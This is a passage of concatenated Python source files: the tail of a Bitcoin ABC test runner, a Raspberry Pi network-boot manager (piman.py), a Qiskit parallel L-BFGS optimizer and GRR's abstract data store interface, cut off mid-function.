return result
class RPCCoverage():
"""
Coverage reporting utilities for test_runner.
Coverage calculation works by having each test script subprocess write
coverage files into a particular directory. These files contain the RPC
commands invoked during testing, as well as a complete listing of RPC
commands per `bitcoin-cli help` (`rpc_interface.txt`).
After all tests complete, the commands run are combined and diff'd against
the complete list to calculate uncovered RPC commands.
See also: test/functional/test_framework/coverage.py
"""
def __init__(self):
self.dir = tempfile.mkdtemp(prefix="coverage")
self.flag = '--coveragedir={}'.format(self.dir)
def report_rpc_coverage(self):
"""
Print out RPC commands that were unexercised by tests.
"""
uncovered = self._get_uncovered_rpc_commands()
if uncovered:
print("Uncovered RPC commands:")
print("".join((" - {}\n".format(i)) for i in sorted(uncovered)))
else:
print("All RPC commands covered.")
def cleanup(self):
return shutil.rmtree(self.dir)
def _get_uncovered_rpc_commands(self):
"""
Return a set of currently untested RPC commands.
"""
# This is shared from `test/functional/test-framework/coverage.py`
reference_filename = 'rpc_interface.txt'
coverage_file_prefix = 'coverage.'
coverage_ref_filename = os.path.join(self.dir, reference_filename)
coverage_filenames = set()
all_cmds = set()
covered_cmds = set()
if not os.path.isfile(coverage_ref_filename):
raise RuntimeError("No coverage reference found")
with open(coverage_ref_filename, 'r') as f:
all_cmds.update([i.strip() for i in f.readlines()])
for root, dirs, files in os.walk(self.dir):
for filename in files:
if filename.startswith(coverage_file_prefix):
coverage_filenames.add(os.path.join(root, filename))
for filename in coverage_filenames:
with open(filename, 'r') as f:
covered_cmds.update([i.strip() for i in f.readlines()])
return all_cmds - covered_cmds
def save_results_as_junit(test_results, file_name, time):
"""
Save tests results to file in JUnit format
See http://llg.cubic.org/docs/junit/ for specification of format
"""
e_test_suite = ET.Element("testsuite",
{"name": "bitcoin_abc_tests",
"tests": str(len(test_results)),
# "errors":
"failures": str(len([t for t in test_results if t.status == "Failed"])),
"id": "0",
"skipped": str(len([t for t in test_results if t.status == "Skipped"])),
"time": str(time),
"timestamp": datetime.datetime.now().isoformat('T')
})
for test_result in test_results:
e_test_case = ET.SubElement(e_test_suite, "testcase",
{"name": test_result.name,
"classname": test_result.name,
"time": str(test_result.time)
}
)
if test_result.status == "Skipped":
ET.SubElement(e_test_case, "skipped")
elif test_result.status == "Failed":
ET.SubElement(e_test_case, "failure")
# no special element for passed tests
ET.SubElement(e_test_case, "system-out").text = test_result.stdout
ET.SubElement(e_test_case, "system-err").text = test_result.stderr
ET.ElementTree(e_test_suite).write(
file_name, "UTF-8", xml_declaration=True)
class Timings():
"""
Takes care of loading, merging and saving tests execution times.
"""
def __init__(self, timing_file):
self.timing_file = timing_file
self.existing_timings = self.load_timings()
def load_timings(self):
if os.path.isfile(self.timing_file):
with open(self.timing_file) as f:
return json.load(f)
else:
return []
def get_merged_timings(self, new_timings):
"""
Return a new list containing the existing timings updated with the new timings.
Timings for tests that no longer exist are not removed.
"""
key = 'name'
merged = {}
for item in self.existing_timings + new_timings:
if item[key] in merged:
merged[item[key]].update(item)
else:
merged[item[key]] = item
# Sort the result to preserve test ordering in file
merged = list(merged.values())
merged.sort(key=lambda t, key=key: t[key])
return merged
def save_timings(self, test_results):
# we only save tests that have passed - timings for failed tests might be
# wrong (timeouts or early fails)
passed_results = [t for t in test_results if t.status == 'Passed']
new_timings = list(map(lambda t: {'name': t.name, 'time': t.time},
passed_results))
merged_timings = self.get_merged_timings(new_timings)
with open(self.timing_file, 'w') as f:
json.dump(merged_timings, f, indent=True)
if __name__ == '__main__':
main()
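# --- Illustrative invocations (not part of the original file) ---
# A few example command lines, using only options defined by the argparse setup
# above; the individual test script names are hypothetical:
#
#   test/functional/test_runner.py                       # run the default (non-extended) set
#   test/functional/test_runner.py --extended --jobs=8   # run everything, 8 scripts in parallel
#   test/functional/test_runner.py wallet_basic abc*     # run one script plus a wildcard match
#   test/functional/test_runner.py --exclude=wallet_multiwallet.py --coverage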
|
piman.py
|
import logging
import logging.config
import os
from zipfile import ZipFile
import io
import time
# create the logger before doing imports since everyone is going
# to use them
local_logfile = './logging.conf'
if os.path.isfile(local_logfile):
logging.config.fileConfig(local_logfile)
else:
zipfile = os.path.dirname(__file__)
with ZipFile(zipfile) as z:
fd = z.open("logging.conf", mode='r')
# convert to a string
confstr = fd.read().decode()
logging.config.fileConfig(io.StringIO(confstr))
#create logger using configuration
logger = logging.getLogger('pimanlogger')
from threading import Thread
from sys import argv
from config_ui import web_ui
from dhcp import dhcp
from tcp import tcp
from tftp import tftp
from utility import power_cycle
from utility import mac_mapper
from piman import logger
from parse_config import config
import ntpserver
'''
piman.py
Attributes:
-----
data_dir : str
the directory of files the Pis need in order to boot
tftp_port : int
TFTP uses UDP port 69 to establish the network connection
tcp_port : int
TCP port number used to establish the network connection
ip : str
network IP address of the Pis and IP address of the router
subnet_mask : str
subnet mask for the IP addresses of the Pis
switch_address : str
IP address of the switch that connects the Pis
mac_ip_file : str
path of the file that maps each Pi's MAC address to its IP address
Methods
-----
server()
start the TFTP, DHCP, and TCP services between the server and the Pis
restart(switch_address, interface, ports)
restart specific Pis by power-cycling their switch ports
reinstall(switch_address, interface, port)
reinstall a specific Pi
exit_piman()
exit piman with an error
'''
data_dir = "./install/boot"
tftp_port = 69
tcp_port = 3333
ip = config['server_address']
subnet_mask = config['subnet_mask']
mac_ip_file = "hosts.csv"
lease_time = 600
interface = config['interface']
def server():
config_ui_thread = Thread(target=config_ui, args=[
"", "./piman.yaml", "./hosts.csv"], name="config_ui")
config_ui_thread.start()
tftp_thread = Thread(target=tftp.do_tftpd, args=[
data_dir, ip, tftp_port], name="tftpd")
tftp_thread.start()
dhcp_thread = Thread(target=dhcp.do_dhcp, args=[
mac_ip_file, subnet_mask, ip, lease_time, interface], name="dhcpd")
dhcp_thread.start()
tcp_thread = Thread(target=tcp.do_tcp, args=[
data_dir, tcp_port, ip], name="tcp")
tcp_thread.start()
ntp_thread = Thread(target=ntpserver.do_ntp)  # pass the function itself, do not call it here
ntp_thread.start()
config_ui_thread.join()
tftp_thread.join()
dhcp_thread.join()
tcp_thread.join()
ntp_thread.join()
def restart(switch_address, interface, ports):
for port in ports:
power_cycle.power_cycle(switch_address, interface, port)
def reinstall(switch_address, interface, port):
with open("reinstall.txt", "w") as f:
network_addr = ip[:7] + str(interface) + "." + str(port)
f.write(network_addr)
power_cycle.power_cycle(switch_address, interface, port)
def mapper(switch_address,interface, port):
for portNum in port:
power_cycle.power_cycle(switch_address,interface, portNum)
time.sleep(30)
mac_mapper.mac_mapper()
def config_ui(name, config_path, hosts_csv_path):
web_ui.start(name, config_path, hosts_csv_path)
def exit_piman():
logger.error("Insufficient amount of arguments")
exit(1)
if __name__ == "__main__":
args = "Arguments: "
for a in argv:
args += a + " "
logger.info(args)
if len(argv) < 2:
exit_piman()
if argv[1] == "server":
server()
elif argv[1] == "restart":
if len(argv) < 5:
exit_piman()
restart(argv[2], argv[3],argv[4])
elif argv[1] == "mapper":
if len(argv) < 5:
exit_piman()
mapper(argv[2],argv[3],argv[4])
elif argv[1] == "reinstall":
if len(argv) < 5:
exit_piman()
reinstall(argv[2], argv[3], argv[4])
elif argv[1] == "config":
config_ui(argv[2], argv[3], argv[4])
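# --- Illustrative invocations (not part of the original file) ---
# Examples of how piman.py is dispatched by the __main__ block above; the
# switch address, interface and port arguments are placeholders:
#
#   python piman.py server
#   python piman.py restart <switch_address> <interface> <ports>
#   python piman.py mapper <switch_address> <interface> <ports>
#   python piman.py reinstall <switch_address> <interface> <port>
#   python piman.py config <name> <config_path> <hosts_csv_path>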
|
p_bfgs.py
|
# -*- coding: utf-8 -*-
# Copyright 2018 IBM.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
import multiprocessing
import platform
import logging
import numpy as np
from scipy import optimize as sciopt
from qiskit.aqua.components.optimizers import Optimizer
logger = logging.getLogger(__name__)
class P_BFGS(Optimizer):
"""Limited-memory BFGS algorithm. Parallel instantiations.
Uses scipy.optimize.fmin_l_bfgs_b
https://docs.scipy.org/doc/scipy/reference/generated/scipy.optimize.fmin_l_bfgs_b.html
"""
CONFIGURATION = {
'name': 'P_BFGS',
'description': 'Parallelized l_bfgs_b Optimizer',
'input_schema': {
'$schema': 'http://json-schema.org/schema#',
'id': 'p_bfgs_b_schema',
'type': 'object',
'properties': {
'maxfun': {
'type': 'integer',
'default': 1000
},
'factr': {
'type': 'integer',
'default': 10
},
'iprint': {
'type': 'integer',
'default': -1
},
'max_processes': {
'type': ['integer', 'null'],
'minimum': 1,
'default': None
}
},
'additionalProperties': False
},
'support_level': {
'gradient': Optimizer.SupportLevel.supported,
'bounds': Optimizer.SupportLevel.supported,
'initial_point': Optimizer.SupportLevel.required
},
'options': ['maxfun', 'factr', 'iprint'],
'optimizer': ['local', 'parallel']
}
def __init__(self, maxfun=1000, factr=10, iprint=-1, max_processes=None):
"""
Constructor.
For details, please refer to
https://docs.scipy.org/doc/scipy/reference/generated/scipy.optimize.fmin_l_bfgs_b.html
Args:
maxfun (int): Maximum number of function evaluations.
factr (float): The iteration stops when (f^k - f^{k+1})/max{|f^k|,
|f^{k+1}|,1} <= factr * eps, where eps is the machine precision,
which is automatically generated by the code. Typical values for
factr are: 1e12 for low accuracy; 1e7 for moderate accuracy;
10.0 for extremely high accuracy. See Notes for relationship to ftol,
which is exposed (instead of factr) by the scipy.optimize.minimize
interface to L-BFGS-B.
iprint (int): Controls the frequency of output. iprint < 0 means no output;
iprint = 0 print only one line at the last iteration; 0 < iprint < 99
print also f and |proj g| every iprint iterations; iprint = 99 print
details of every iteration except n-vectors; iprint = 100 print also the
changes of active set and final x; iprint > 100 print details of
every iteration including x and g.
max_processes (int): maximum number of processes allowed.
"""
self.validate(locals())
super().__init__()
for k, v in locals().items():
if k in self._configuration['options']:
self._options[k] = v
self._max_processes = max_processes
def optimize(self, num_vars, objective_function, gradient_function=None, variable_bounds=None, initial_point=None):
num_procs = multiprocessing.cpu_count() - 1
num_procs = num_procs if self._max_processes is None else min(num_procs, self._max_processes)
num_procs = num_procs if num_procs >= 0 else 0
if platform.system() == "Windows":
num_procs = 0
logger.warning("Using only current process. Multiple core use not supported in Windows")
queue = multiprocessing.Queue()
threshold = 2*np.pi # bounds for additional initial points in case bounds has any None values
low = [(l if l is not None else -threshold) for (l, u) in variable_bounds]
high = [(u if u is not None else threshold) for (l, u) in variable_bounds]
def optimize_runner(_queue, _i_pt): # Multi-process sampling
_sol, _opt, _nfev = self._optimize(num_vars, objective_function, gradient_function, variable_bounds, _i_pt)
_queue.put((_sol, _opt, _nfev))
# Start off as many other processes running the optimize (can be 0)
processes = []
for i in range(num_procs):
i_pt = np.random.uniform(low, high) # Another random point in bounds
p = multiprocessing.Process(target=optimize_runner, args=(queue, i_pt))
processes.append(p)
p.start()
# While the _optimize call below runs in this process, the other processes are running too.
# This one uses the supplied initial point; the spawned processes each use their own random one.
sol, opt, nfev = self._optimize(num_vars, objective_function, gradient_function, variable_bounds, initial_point)
for p in processes:
# For each other process we wait now for it to finish and see if it has a better result than above
p.join()
p_sol, p_opt, p_nfev = queue.get()
if p_opt < opt:
sol, opt = p_sol, p_opt
nfev += p_nfev
return sol, opt, nfev
def _optimize(self, num_vars, objective_function, gradient_function=None, variable_bounds=None, initial_point=None):
super().optimize(num_vars, objective_function, gradient_function, variable_bounds, initial_point)
approx_grad = True if gradient_function is None else False
sol, opt, info = sciopt.fmin_l_bfgs_b(objective_function, initial_point, bounds=variable_bounds,
fprime=gradient_function, approx_grad=approx_grad, **self._options)
return sol, opt, info['funcalls']
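# Hedged usage sketch (added for illustration, not part of the original module):
# the parallel wrapper above delegates to scipy.optimize.fmin_l_bfgs_b and
# mirrors its return convention. The toy objective and starting point below are
# assumptions, chosen only to show that call pattern and the meaning of the
# (sol, opt, nfev) triple returned by optimize().
if __name__ == "__main__":
    import numpy
    import scipy.optimize

    def _toy_quadratic(x):
        # Simple convex objective with its minimum at x = [3, 3, 3, 3].
        return float(numpy.sum((x - 3.0) ** 2))

    _sol, _opt, _info = scipy.optimize.fmin_l_bfgs_b(
        _toy_quadratic, numpy.zeros(4), approx_grad=True,
        maxfun=1000, factr=10, iprint=-1)
    # _sol is the minimizer, _opt the objective value, and _info['funcalls'] the
    # number of function evaluations.
    print(_sol, _opt, _info['funcalls'])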
|
data_store.py
|
#!/usr/bin/env python
"""The main data store abstraction.
The data store is responsible for storing AFF4 objects permanently. This file
defines the basic interface of the data store, but there is no specific
implementation. Concrete implementations should extend the DataStore class and
provide non-abstract methods.
The data store is essentially an object store. Objects have a subject (a unique
identifying name) and a series of arbitrary attributes. Attributes also have a
name and can only store a number of well defined types.
Some data stores have internal capability to filter and search for objects based
on attribute conditions. Due to the variability of this capability in
implementations, the Filter() class is defined inside the DataStore class
itself. This allows callers to create a data store specific filter
implementation, with no prior knowledge of the concrete implementation.
In order to accommodate the data store's basic filtering capabilities, it is
important to allow the data store to store attribute values using the most
appropriate types.
The currently supported data store storage types are:
- Integer
- Bytes
- String (unicode object).
This means that if one stores an attribute containing an integer, and then
retrieves this attribute, the data store guarantees that an integer is
returned (although it may be stored internally as something else).
More complex types should be encoded into bytes and stored in the data store as
bytes. The data store can then treat the type as an opaque type (and will not be
able to filter it directly).
"""
import abc
import atexit
import sys
import time
import logging
from grr.lib import access_control
from grr.lib import blob_store
from grr.lib import config_lib
from grr.lib import flags
from grr.lib import rdfvalue
from grr.lib import registry
from grr.lib import stats
from grr.lib import utils
flags.DEFINE_bool("list_storage", False, "List all storage subsystems present.")
# A global data store handle
DB = None
# There are stub methods that don't return/yield as indicated by the docstring.
# pylint: disable=g-doc-return-or-yield
class Error(stats.CountingExceptionMixin, Exception):
"""Base class for all exceptions in this module."""
pass
class TimeoutError(Exception):
"""Raised when an access times out."""
pass
class DBSubjectLockError(Error):
"""Raised when a lock fails to commit."""
counter = "grr_commit_failure"
# This token will be used by default if no token was provided.
default_token = None
def GetDefaultToken(token):
"""Returns the provided token or the default token.
Args:
token: A token or None.
Raises:
access_control.UnauthorizedAccess, if no token was provided.
"""
if token is None:
token = default_token
if not isinstance(token, access_control.ACLToken):
raise access_control.UnauthorizedAccess(
"Token is not properly specified. It should be an "
"instance of grr.lib.access_control.ACLToken()")
return token
class MutationPool(object):
"""A mutation pool.
This is a pool to group a number of mutations together and apply
them at the same time. Note that there are no guarantees about the
atomicity of the mutations. Currently, no mutation will be applied
before Flush() is called on the pool. If datastore errors occur
during application, some mutations might be applied while others are
not.
"""
def __init__(self, token=None):
self.token = token
self.delete_subject_requests = []
self.set_requests = []
self.delete_attributes_requests = []
def DeleteSubjects(self, subjects):
self.delete_subject_requests.extend(subjects)
def DeleteSubject(self, subject):
self.delete_subject_requests.append(subject)
def MultiSet(self,
subject,
values,
timestamp=None,
replace=True,
to_delete=None):
self.set_requests.append((subject, values, timestamp, replace, to_delete))
def Set(self, subject, attribute, value, timestamp=None, replace=True):
self.MultiSet(
subject, {attribute: [value]}, timestamp=timestamp, replace=replace)
def DeleteAttributes(self, subject, attributes, start=None, end=None):
self.delete_attributes_requests.append((subject, attributes, start, end))
def Flush(self):
"""Flushing actually applies all the operations in the pool."""
DB.DeleteSubjects(
self.delete_subject_requests, token=self.token, sync=False)
for req in self.delete_attributes_requests:
subject, attributes, start, end = req
DB.DeleteAttributes(
subject,
attributes,
start=start,
end=end,
token=self.token,
sync=False)
for req in self.set_requests:
subject, values, timestamp, replace, to_delete = req
DB.MultiSet(
subject,
values,
timestamp=timestamp,
replace=replace,
to_delete=to_delete,
token=self.token,
sync=False)
if (self.delete_subject_requests or self.delete_attributes_requests or
self.set_requests):
DB.Flush()
self.delete_subject_requests = []
self.set_requests = []
self.delete_attributes_requests = []
def __enter__(self):
return self
def __exit__(self, unused_type, unused_value, unused_traceback):
self.Flush()
def Size(self):
return (len(self.delete_subject_requests) + len(self.set_requests) +
len(self.delete_attributes_requests))
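# Hedged usage sketch (added for illustration, not part of the original GRR
# module): a MutationPool is typically used as a context manager so that all
# queued mutations are flushed together on exit. The subject and attribute
# names below are hypothetical, and this assumes the global DB handle has
# already been initialized by DataStoreInit.
def _example_mutation_pool_usage(token=None):
  with MutationPool(token=token) as pool:
    pool.Set("aff4:/example/subject", "metadata:example", 42)
    pool.DeleteAttributes("aff4:/example/subject", ["metadata:stale"])
    pool.DeleteSubject("aff4:/example/obsolete")
    # Leaving the with-block calls Flush(), which applies the queued requests
    # through DB.MultiSet / DB.DeleteAttributes / DB.DeleteSubjects and then
    # clears the pool.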
class DataStore(object):
"""Abstract database access."""
__metaclass__ = registry.MetaclassRegistry
# Constants relating to timestamps.
ALL_TIMESTAMPS = "ALL_TIMESTAMPS"
NEWEST_TIMESTAMP = "NEWEST_TIMESTAMP"
TIMESTAMPS = [ALL_TIMESTAMPS, NEWEST_TIMESTAMP]
LEASE_ATTRIBUTE = "aff4:lease"
mutation_pool_cls = MutationPool
flusher_thread = None
monitor_thread = None
def __init__(self):
security_manager = access_control.AccessControlManager.GetPlugin(
config_lib.CONFIG["Datastore.security_manager"])()
self.security_manager = security_manager
logging.info("Using security manager %s", security_manager)
# Start the flusher thread.
self.flusher_thread = utils.InterruptableThread(
name="DataStore flusher thread", target=self.Flush, sleep_time=0.5)
self.flusher_thread.start()
self.monitor_thread = None
def GetRequiredResolveAccess(self, attribute_prefix):
"""Returns required level of access for resolve operations.
Args:
attribute_prefix: A string (single attribute) or a list of
strings (multiple attributes).
Returns:
"r" when only read access is needed for resolve operation to succeed.
Read operation allows reading the object when its URN is known.
"rq" when both read and query access is needed for resolve operation to
succeed. Query access allows reading indices, and thus traversing
trees of objects (see AFF4Volume.ListChildren for details).
"""
if isinstance(attribute_prefix, basestring):
attribute_prefix = [utils.SmartStr(attribute_prefix)]
else:
attribute_prefix = [utils.SmartStr(x) for x in attribute_prefix]
for prefix in attribute_prefix:
if not prefix:
return "rq"
# Extract the column family
try:
column_family, _ = prefix.split(":", 1)
except ValueError:
raise RuntimeError("The attribute prefix must contain the column "
"family: %s" % prefix)
# Columns with index require the query permission.
if column_family.startswith("index"):
return "rq"
return "r"
def InitializeBlobstore(self):
blobstore_name = config_lib.CONFIG.Get("Blobstore.implementation")
try:
cls = blob_store.Blobstore.GetPlugin(blobstore_name)
except KeyError:
raise RuntimeError("No blob store %s found." % blobstore_name)
self.blobstore = cls()
def InitializeMonitorThread(self):
"""Start the thread that registers the size of the DataStore."""
if self.monitor_thread:
return
self.monitor_thread = utils.InterruptableThread(
name="DataStore monitoring thread",
target=self._RegisterSize,
sleep_time=60)
self.monitor_thread.start()
def _RegisterSize(self):
"""Measures size of DataStore."""
stats.STATS.SetGaugeValue("datastore_size", self.Size())
def Initialize(self):
"""Initialization of the datastore."""
self.InitializeBlobstore()
@abc.abstractmethod
def DeleteSubject(self, subject, sync=False, token=None):
"""Completely deletes all information about this subject."""
def DeleteSubjects(self, subjects, sync=False, token=None):
"""Delete multiple subjects at once."""
for subject in subjects:
self.DeleteSubject(subject, sync=sync, token=token)
def Set(self,
subject,
attribute,
value,
timestamp=None,
token=None,
replace=True,
sync=True):
"""Set a single value for this subject's attribute.
Args:
subject: The subject this applies to.
attribute: Attribute name.
      value: The value to set, serialized into one of the supported types.
timestamp: The timestamp for this entry in microseconds since the
epoch. If None means now.
token: An ACL token.
replace: Bool whether or not to overwrite current records.
sync: If true we ensure the new values are committed before returning.
"""
# TODO(user): don't allow subject = None
self.MultiSet(
subject, {attribute: [value]},
timestamp=timestamp,
token=token,
replace=replace,
sync=sync)
def LockRetryWrapper(self,
subject,
retrywrap_timeout=1,
token=None,
retrywrap_max_timeout=10,
blocking=True,
lease_time=None):
"""Retry a DBSubjectLock until it succeeds.
Args:
subject: The subject which the lock applies to.
retrywrap_timeout: How long to wait before retrying the lock.
token: An ACL token.
retrywrap_max_timeout: The maximum time to wait for a retry until we
raise.
blocking: If False, raise on first lock failure.
lease_time: lock lease time in seconds.
Returns:
The DBSubjectLock object
Raises:
DBSubjectLockError: If the maximum retry count has been reached.
"""
timeout = 0
while timeout < retrywrap_max_timeout:
try:
return self.DBSubjectLock(subject, token=token, lease_time=lease_time)
except DBSubjectLockError:
if not blocking:
raise
stats.STATS.IncrementCounter("datastore_retries")
time.sleep(retrywrap_timeout)
timeout += retrywrap_timeout
raise DBSubjectLockError("Retry number exceeded.")
@abc.abstractmethod
def DBSubjectLock(self, subject, lease_time=None, token=None):
"""Returns a DBSubjectLock object for a subject.
This opens a read/write lock to the subject. Any read access to the subject
will have a consistent view between threads. Any attempts to write to the
subject must be performed under lock. DBSubjectLocks may fail and raise the
DBSubjectLockError() exception.
Users should almost always call LockRetryWrapper() to retry if the lock
isn't obtained on the first try.
Args:
subject: The subject which the lock applies to. Only a
single subject may be locked in a lock.
lease_time: The minimum amount of time the lock should remain
alive.
token: An ACL token.
Returns:
A lock object.
"""
@abc.abstractmethod
def MultiSet(self,
subject,
values,
timestamp=None,
replace=True,
sync=True,
to_delete=None,
token=None):
"""Set multiple attributes' values for this subject in one operation.
Args:
subject: The subject this applies to.
      values: A dict mapping attributes to the serialized values to be set.
        Each value can be a tuple of (value, timestamp). Values must be one of
        the supported types.
timestamp: The timestamp for this entry in microseconds since the
epoch. None means now.
replace: Bool whether or not to overwrite current records.
sync: If true we block until the operation completes.
to_delete: An array of attributes to clear prior to setting.
token: An ACL token.
"""
def MultiDeleteAttributes(self,
subjects,
attributes,
start=None,
end=None,
sync=True,
token=None):
"""Remove all specified attributes from a list of subjects.
Args:
subjects: The list of subjects that will have these attributes removed.
attributes: A list of attributes.
start: A timestamp, attributes older than start will not be deleted.
end: A timestamp, attributes newer than end will not be deleted.
sync: If true we block until the operation completes.
token: An ACL token.
"""
for subject in subjects:
self.DeleteAttributes(
subject, attributes, start=start, end=end, sync=sync, token=token)
@abc.abstractmethod
def DeleteAttributes(self,
subject,
attributes,
start=None,
end=None,
sync=True,
token=None):
"""Remove all specified attributes.
Args:
subject: The subject that will have these attributes removed.
attributes: A list of attributes.
start: A timestamp, attributes older than start will not be deleted.
end: A timestamp, attributes newer than end will not be deleted.
sync: If true we block until the operation completes.
token: An ACL token.
"""
def Resolve(self, subject, attribute, token=None):
"""Retrieve a value set for a subject's attribute.
This method is easy to use but always gets the latest version of the
attribute. It is more flexible and efficient to use the other Resolve
methods.
Args:
subject: The subject URN.
attribute: The attribute.
token: An ACL token.
Returns:
A (value, timestamp in microseconds) stored in the datastore cell, or
(None, 0). Value will be the same type as originally stored with Set().
Raises:
AccessError: if anything goes wrong.
"""
for _, value, timestamp in self.ResolveMulti(
subject, [attribute], token=token, timestamp=self.NEWEST_TIMESTAMP):
# Just return the first one.
return value, timestamp
return (None, 0)
@abc.abstractmethod
def MultiResolvePrefix(self,
subjects,
attribute_prefix,
timestamp=None,
limit=None,
token=None):
"""Generate a set of values matching for subjects' attribute.
This method provides backwards compatibility for the old method of
specifying regexes. Each datastore can move to prefix matching by
overriding this method and ResolvePrefix below.
Args:
subjects: A list of subjects.
attribute_prefix: The attribute prefix.
timestamp: A range of times for consideration (In
microseconds). Can be a constant such as ALL_TIMESTAMPS or
NEWEST_TIMESTAMP or a tuple of ints (start, end). Inclusive of both
lower and upper bounds.
limit: The total number of result values to return.
token: An ACL token.
Returns:
A dict keyed by subjects, with values being a list of (attribute, value
string, timestamp).
Values with the same attribute (happens when timestamp is not
NEWEST_TIMESTAMP, but ALL_TIMESTAMPS or time range) are guaranteed
to be ordered in the decreasing timestamp order.
Raises:
AccessError: if anything goes wrong.
"""
def ResolvePrefix(self,
subject,
attribute_prefix,
timestamp=None,
limit=None,
token=None):
"""Retrieve a set of value matching for this subject's attribute.
Args:
subject: The subject that we will search.
attribute_prefix: The attribute prefix.
timestamp: A range of times for consideration (In
microseconds). Can be a constant such as ALL_TIMESTAMPS or
NEWEST_TIMESTAMP or a tuple of ints (start, end).
limit: The number of results to fetch.
token: An ACL token.
Returns:
A list of (attribute, value string, timestamp).
Values with the same attribute (happens when timestamp is not
NEWEST_TIMESTAMP, but ALL_TIMESTAMPS or time range) are guaranteed
to be ordered in the decreasing timestamp order.
Raises:
AccessError: if anything goes wrong.
"""
for _, values in self.MultiResolvePrefix(
[subject],
attribute_prefix,
timestamp=timestamp,
token=token,
limit=limit):
values.sort(key=lambda a: a[0])
return values
return []
def ResolveMulti(self,
subject,
attributes,
timestamp=None,
limit=None,
token=None):
"""Resolve multiple attributes for a subject.
Results may be in unsorted order.
Args:
subject: The subject to resolve.
attributes: The attribute string or list of strings to match. Note this is
an exact match, not a regex.
timestamp: A range of times for consideration (In
microseconds). Can be a constant such as ALL_TIMESTAMPS or
NEWEST_TIMESTAMP or a tuple of ints (start, end).
limit: The maximum total number of results we return.
token: The security token used in this call.
"""
def ResolveRow(self, subject, **kw):
return self.ResolvePrefix(subject, "", **kw)
@abc.abstractmethod
def Flush(self):
"""Flushes the DataStore."""
def Size(self):
"""DataStore size in bytes."""
return -1
def __del__(self):
if self.flusher_thread:
self.flusher_thread.Stop()
if self.monitor_thread:
self.monitor_thread.Stop()
try:
self.Flush()
except Exception: # pylint: disable=broad-except
pass
def _CleanSubjectPrefix(self, subject_prefix):
subject_prefix = utils.SmartStr(rdfvalue.RDFURN(subject_prefix))
if subject_prefix[-1] != "/":
subject_prefix += "/"
return subject_prefix
def _CleanAfterURN(self, after_urn, subject_prefix):
if after_urn:
after_urn = utils.SmartStr(after_urn)
if not after_urn.startswith(subject_prefix):
raise RuntimeError("after_urn \"%s\" does not begin with prefix \"%s\""
% (after_urn, subject_prefix))
return after_urn
@abc.abstractmethod
def ScanAttributes(self,
subject_prefix,
attributes,
after_urn=None,
max_records=None,
token=None,
relaxed_order=False):
"""Scan for values of multiple attributes across a range of rows.
    Scans rows for values of the given attributes, reading the most recent value
    stored in each row.
Args:
subject_prefix: Subject beginning with this prefix can be scanned. Must
be an aff4 object and a directory - "/" will be appended if necessary.
User must have read and query permissions on this directory.
attributes: A list of attribute names to scan.
after_urn: If set, only scan records which come after this urn.
max_records: The maximum number of records to scan.
token: The security token to authenticate with.
      relaxed_order: By default, ScanAttribute yields results in lexicographic
order. If this is set, a datastore may yield results in a more
convenient order. For certain datastores this might greatly increase
the performance of large scans.
Yields: Pairs (subject, result_dict) where result_dict maps attribute to
(timestamp, value) pairs.
"""
def ScanAttribute(self,
subject_prefix,
attribute,
after_urn=None,
max_records=None,
token=None,
relaxed_order=False):
for s, r in self.ScanAttributes(
subject_prefix, [attribute],
after_urn=after_urn,
max_records=max_records,
token=token,
relaxed_order=relaxed_order):
ts, v = r[attribute]
yield (s, ts, v)
def ReadBlob(self, identifier, token=None):
return self.ReadBlobs([identifier], token=token).values()[0]
def ReadBlobs(self, identifiers, token=None):
return self.blobstore.ReadBlobs(identifiers, token=token)
def StoreBlob(self, content, token=None):
return self.blobstore.StoreBlob(content, token=token)
def StoreBlobs(self, contents, token=None):
return self.blobstore.StoreBlobs(contents, token=token)
def BlobExists(self, identifier, token=None):
return self.BlobsExist([identifier], token=token).values()[0]
def BlobsExist(self, identifiers, token=None):
return self.blobstore.BlobsExist(identifiers, token=token)
def DeleteBlob(self, identifier, token=None):
return self.DeleteBlobs([identifier], token=token)
def DeleteBlobs(self, identifiers, token=None):
return self.blobstore.DeleteBlobs(identifiers, token=token)
def GetMutationPool(self, token=None):
return self.mutation_pool_cls(token=token)
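# Hedged usage sketch (added for illustration): simple reads and writes go
# through the global DB handle created by DataStoreInit.Run(). The subject and
# attribute names are hypothetical; a real caller would also pass a valid ACL
# token.
def _example_set_and_resolve(token=None):
  DB.Set("aff4:/example/subject", "metadata:counter", 7, token=token)
  value, timestamp = DB.Resolve("aff4:/example/subject", "metadata:counter",
                                token=token)
  # Resolve() returns the newest (value, timestamp in microseconds) pair, or
  # (None, 0) if the cell has never been written.
  return value, timestamp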
class DBSubjectLock(object):
"""Provide a simple subject lock using the database.
This class should not be used directly. Its only safe to use via the
DataStore.LockRetryWrapper() above which implements correct backoff and
retry behavior.
"""
__metaclass__ = registry.MetaclassRegistry
def __init__(self, data_store, subject, lease_time=None, token=None):
"""Obtain the subject lock for lease_time seconds.
This is never called directly but produced from the
DataStore.LockedSubject() factory.
Args:
data_store: A data_store handler.
subject: The name of a subject to lock.
lease_time: The minimum length of time the lock will remain valid in
seconds. Note this will be converted to usec for storage.
token: An ACL token which applies to all methods in this lock.
"""
self.subject = utils.SmartStr(subject)
self.store = data_store
self.token = token
# expires should be stored as usec
self.expires = None
self.locked = False
if lease_time is None:
lease_time = config_lib.CONFIG["Datastore.transaction_timeout"]
self._Acquire(lease_time)
def __enter__(self):
return self
def __exit__(self, unused_type, unused_value, unused_traceback):
self.Release()
def _Acquire(self, lease_time):
raise NotImplementedError
def Release(self):
raise NotImplementedError
def UpdateLease(self, duration):
"""Update the lock lease time by at least the number of seconds.
Note that not all data stores implement timed locks. This method is
only useful for data stores which expire a lock after some time.
Args:
duration: The number of seconds to extend the lock lease.
"""
raise NotImplementedError
def CheckLease(self):
"""Return the time remaining on the lock in seconds."""
if not self.expires:
return 0
return max(0, self.expires / 1e6 - time.time())
def __del__(self):
try:
self.Release()
except Exception: # This can raise on cleanup pylint: disable=broad-except
pass
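# Hedged usage sketch (added for illustration): locks are normally taken via
# DataStore.LockRetryWrapper(), which retries DBSubjectLock() with backoff and
# returns a lock object that works as a context manager. The subject below is
# hypothetical.
def _example_locked_update(token=None):
  with DB.LockRetryWrapper("aff4:/example/subject", token=token) as lock:
    # Writes to the subject should happen while the lock is held; Release() is
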